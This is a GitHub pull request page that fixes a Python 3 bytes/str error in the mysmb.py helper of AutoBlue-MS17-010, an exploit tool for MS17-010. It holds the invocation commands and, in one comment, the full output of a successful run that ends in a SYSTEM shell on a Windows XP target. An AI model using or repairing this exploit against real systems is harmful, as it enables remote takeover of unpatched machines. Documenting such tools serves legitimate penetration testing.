Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix mysmb.py #44

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Fix mysmb.py #44

wants to merge 1 commit into from

Conversation

opabravo
Copy link

Fix TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object

Machine Info

OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
System type: X86-based PC

Error output

┌──(venv-py3.8)─(xxx㉿fsociety)-[/opt/sectools/CVE/AutoBlue-MS17-010]
└─$ python zzz_exploit.py legacy -pipe browser
[*] Target OS: Windows 5.1
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
Traceback (most recent call last):
  File "zzz_exploit.py", line 1112, in <module>
    main()
  File "zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
  File "zzz_exploit.py", line 617, in exploit_fish_barrel
    conn.send_trans_secondary(mid=info['fid'], data=b'\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 315, in send_trans_secondary
    self.send_raw(self.create_trans_secondary_packet(mid, param, paramDisplacement, data, dataDisplacement, pid, tid, noPad))
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 311, in create_trans_secondary_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 89, in _put_trans_data
    transData += (b'\x00' * padLen) + str.encode(data)
TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object

@opabravo
Fix mysmb.py
a0202a5 
Fix `TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object`
@3ndG4me 3ndG4me self-assigned this Dec 24, 2023
@3ndG4me 3ndG4me self-requested a review December 24, 2023 18:28
@3ndG4me 3ndG4me added the bug label Dec 24, 2023
@3ndG4me
Copy link
Owner

3ndG4me commented Dec 24, 2023

This looks good, but still need to test it. Just updating the issue to let ya know it is on my radar!

@0xSH4RKS
Copy link

0xSH4RKS commented Apr 18, 2024
edited
Loading

Tested this fix, working on kali-2024.1

┌──(kali㉿kali)-[~/tools/AutoBlue-MS17-010]
└─$ python3 zzz_exploit.py 10.101.8.31                 
[*] Target OS: Windows 5.1
[+] Found pipe 'browser'
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
Traceback (most recent call last):
  File "/home/kali/tools/AutoBlue-MS17-010/zzz_exploit.py", line 1112, in <module>
    main()
  File "/home/kali/tools/AutoBlue-MS17-010/zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "/home/kali/tools/AutoBlue-MS17-010/zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/tools/AutoBlue-MS17-010/zzz_exploit.py", line 617, in exploit_fish_barrel
    conn.send_trans_secondary(mid=info['fid'], data=b'\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
  File "/home/kali/tools/AutoBlue-MS17-010/mysmb.py", line 315, in send_trans_secondary
    self.send_raw(self.create_trans_secondary_packet(mid, param, paramDisplacement, data, dataDisplacement, pid, tid, noPad))
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/tools/AutoBlue-MS17-010/mysmb.py", line 311, in create_trans_secondary_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "/home/kali/tools/AutoBlue-MS17-010/mysmb.py", line 89, in _put_trans_data
    transData += (b'\x00' * padLen) + str.encode(data)
                                      ^^^^^^^^^^^^^^^^
TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object

──(kali㉿kali)-[~/tools/AutoBlue-MS17-010]
└─$ python3 zzz_exploit.py 10.101.8.31
[*] Target OS: Windows 5.1
[+] Found pipe 'browser'
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x87c04da8
SESSION: 0xe1307720
FLINK: 0x16bd48
InData: 0x16ae28
MID: 0xa
TRANS1: 0x168b50
TRANS2: 0x16ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe2990380
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe2990420
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^) 
[!] Executing interactive programs will hang shell!
C:\Windows\system32>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@3ndG4me 3ndG4me Awaiting requested review from 3ndG4me

Assignees

@3ndG4me 3ndG4me

Labels
bug
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@opabravo @3ndG4me @0xSH4RKS